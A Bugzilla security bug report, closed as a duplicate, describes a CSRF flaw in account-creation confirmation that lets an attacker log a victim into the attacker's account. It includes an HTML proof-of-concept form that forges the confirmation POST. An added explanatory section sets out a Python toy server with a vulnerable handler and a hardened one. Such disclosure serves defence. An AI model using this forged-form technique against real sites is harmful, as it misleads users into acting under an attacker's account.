Closed Bug 994297 Opened 11 years ago Closed 11 years ago

Switching a user to another account via lack of CSRF token in confirming account creation

Categories

(Bugzilla :: User Accounts, defect)

x86_64
Windows 8
defect
Not set
normal

Tracking


RESOLVED DUPLICATE of bug 713926

People

(Reporter: dawid, Unassigned)

Details

(Keywords: reporter-external)

Steps to reproduce:

User logs in to his account and then the following actions are performed:

1. Enter https://bugzilla.mozilla.org/index.cgi?logout=1 to log out the user.
2. Then log in the user to another account (attacker's account) via lack of CSRF token in confirming account creation.

POC (for demonstration purposes with Submit button; normally sent automatically):

    <html>
    <body>
    <form action="https://bugzilla.mozilla.org/token.cgi" method="POST">
    <input type="hidden" name="t" value="TOKEN_FOR_CONFIRMING_ACCOUNT_OF_ATTACKER" />
    <input type="hidden" name="a" value="confirm&#95;new&#95;account" />
    <input type="hidden" name="realname" value="" />
    <input type="hidden" name="passwd1" value="PASSWORD_ATTACKER" />
    <input type="hidden" name="passwd2" value="PASSWORD_ATTACKER" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>

Please notice that there is no CSRF token in this request. The attacker knows TOKEN_FOR_CONFIRMING_ACCOUNT_OF_ATTACKER for his account, because he has received a URL with this token in his mail (this URL has the form: https://bugzilla.mozilla.org/token.cgi?t=TOKEN_FOR_CONFIRMING_ACCOUNT_OF_ATTACKER&a=request_new_account). That's why the attacker knows all the data needed to prepare the aforementioned POC.

There might be different reasons for the attacker to launch this attack. An exemplary and interesting one is getting a bounty for a bug submitted by another user (the attacker switches the user into his account; the user thinks that he is using his own account and submits a bug; the action is done from the attacker's account and the bounty goes to the attacker).
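The report above relies on the fact that the emailed account-confirmation token is the only secret the confirm request carries, and the attacker legitimately holds such a token for his own account. The following is an added example, not Bugzilla's code and not the fix applied in bug 713926: a constructed toy server (the names Server, Request, confirm_vulnerable and confirm_hardened are assumptions) that models the two-step sequence from the report against a logged-in victim, first with a handler that accepts only the emailed token, then with one that additionally demands a one-time CSRF token bound to the browser session that rendered the confirmation form. The cross-site POST carries the victim's cookie (the browser attaches it) but cannot carry a CSRF token the server never issued to it.

```python
"""Added example, not Bugzilla's code: why the emailed confirmation token alone
cannot protect the account-confirmation POST against CSRF.

Two different secrets are involved:
  * the emailed token 't' proves the caller can read the new account's mailbox;
    the attacker holds one for the account he registered himself.
  * a CSRF token bound to the browser session that rendered the confirm form
    proves the POST came from that form and not from a third-party page.
"""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    """A constructed stand-in for an HTTP request: cookies plus POST form fields."""
    cookies: dict
    form: dict


@dataclass
class Server:
    pending: dict = field(default_factory=dict)      # emailed token -> email of new account
    sessions: dict = field(default_factory=dict)     # session id -> logged-in user or None
    csrf_tokens: dict = field(default_factory=dict)  # session id -> one-time CSRF token

    def register(self, email):
        """request_new_account: mint the token that would be emailed to `email`."""
        t = secrets.token_urlsafe(16)
        self.pending[t] = email
        return t

    def logout(self, request):
        """index.cgi?logout=1 as used in step 1 of the report."""
        sid = request.cookies.get("sid")
        if sid in self.sessions:
            self.sessions[sid] = None

    def render_confirm_form(self, request):
        """The page the emailed link opens, which carries the confirm form.
        A CSRF token is minted and bound to the browser's session cookie; the
        form would embed it as a hidden field."""
        sid = request.cookies.get("sid") or secrets.token_urlsafe(16)
        self.sessions.setdefault(sid, None)
        self.csrf_tokens[sid] = secrets.token_urlsafe(16)
        return sid, self.csrf_tokens[sid]

    def _complete(self, request, sid):
        email = self.pending.pop(request.form.get("t"), None)
        if email is None or request.form.get("passwd1") != request.form.get("passwd2"):
            return "error: bad token or password mismatch"
        self.sessions[sid] = email   # the browser holding `sid` is now logged in as `email`
        return "ok"

    def confirm_vulnerable(self, request):
        """The reported pattern: the emailed token plus a password is all the
        POST needs, so any site can submit it from the victim's browser."""
        sid = request.cookies.get("sid") or secrets.token_urlsafe(16)
        return self._complete(request, sid)

    def confirm_hardened(self, request):
        """Also requires the session-bound, single-use CSRF token; only a form
        this server rendered into this browser can supply it."""
        sid = request.cookies.get("sid")
        expected = self.csrf_tokens.pop(sid, None) if sid else None
        supplied = request.form.get("csrf", "")
        if not expected or not hmac.compare_digest(expected, supplied):
            return "error: missing or invalid CSRF token"
        return self._complete(request, sid)


def cross_site_attack(hardened):
    """Replays the report's two steps against a logged-in victim and returns
    who the victim's browser ends up logged in as (None = nobody)."""
    srv = Server()
    srv.sessions["victim-sid"] = "victim@example.org"          # constructed victim session
    attacker_token = srv.register("attacker@example.org")      # attacker reads this from his own inbox
    srv.logout(Request(cookies={"sid": "victim-sid"}, form={}))  # step 1: log the victim out
    forged = Request(cookies={"sid": "victim-sid"},            # browser attaches the cookie...
                     form={"t": attacker_token, "a": "confirm_new_account",
                           "passwd1": "x", "passwd2": "x"})    # ...but no CSRF token: no form was rendered here
    handler = srv.confirm_hardened if hardened else srv.confirm_vulnerable
    handler(forged)                                            # step 2: the cross-site POST
    return srv.sessions["victim-sid"]


def legitimate_confirmation():
    """A real user who opened the emailed link still passes the hardened check."""
    srv = Server()
    t = srv.register("newuser@example.org")
    sid, csrf = srv.render_confirm_form(Request(cookies={}, form={}))
    result = srv.confirm_hardened(Request(cookies={"sid": sid},
                                          form={"t": t, "csrf": csrf,
                                                "passwd1": "x", "passwd2": "x"}))
    return result, srv.sessions[sid]


if __name__ == "__main__":
    print("vulnerable handler, victim now logged in as:", cross_site_attack(hardened=False))
    print("hardened handler, victim now logged in as:", cross_site_attack(hardened=True))
    print("legitimate user through hardened handler:", legitimate_confirmation())
```

The hardened handler does not need to distrust the emailed token; it only refuses to act on it unless the same browser also presents a token the server issued to it when it rendered the form, which is exactly what a page on another origin cannot obtain. The same session-bound check is what closes the login CSRF the duplicate bug describes, which is why the two reports share a root cause.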
This is already fixed by bug 713926.
Status: UNCONFIRMED → RESOLVED
Closed: 11 years ago
Resolution: --- → DUPLICATE
Please notice that this report is different from https://bugzilla.mozilla.org/show_bug.cgi?id=713926. I am not talking here about CSRF in login. I report CSRF in confirming account creation. Yes, they both allow the same things to be done, but they are two separate vulnerabilities.
(In reply to Dawid Czagan from comment #2)
> they both allow to do the same things, but they are two separate vulnerabilities.

They have the same root cause, which is already fixed in the other bug.
Group: bugzilla-security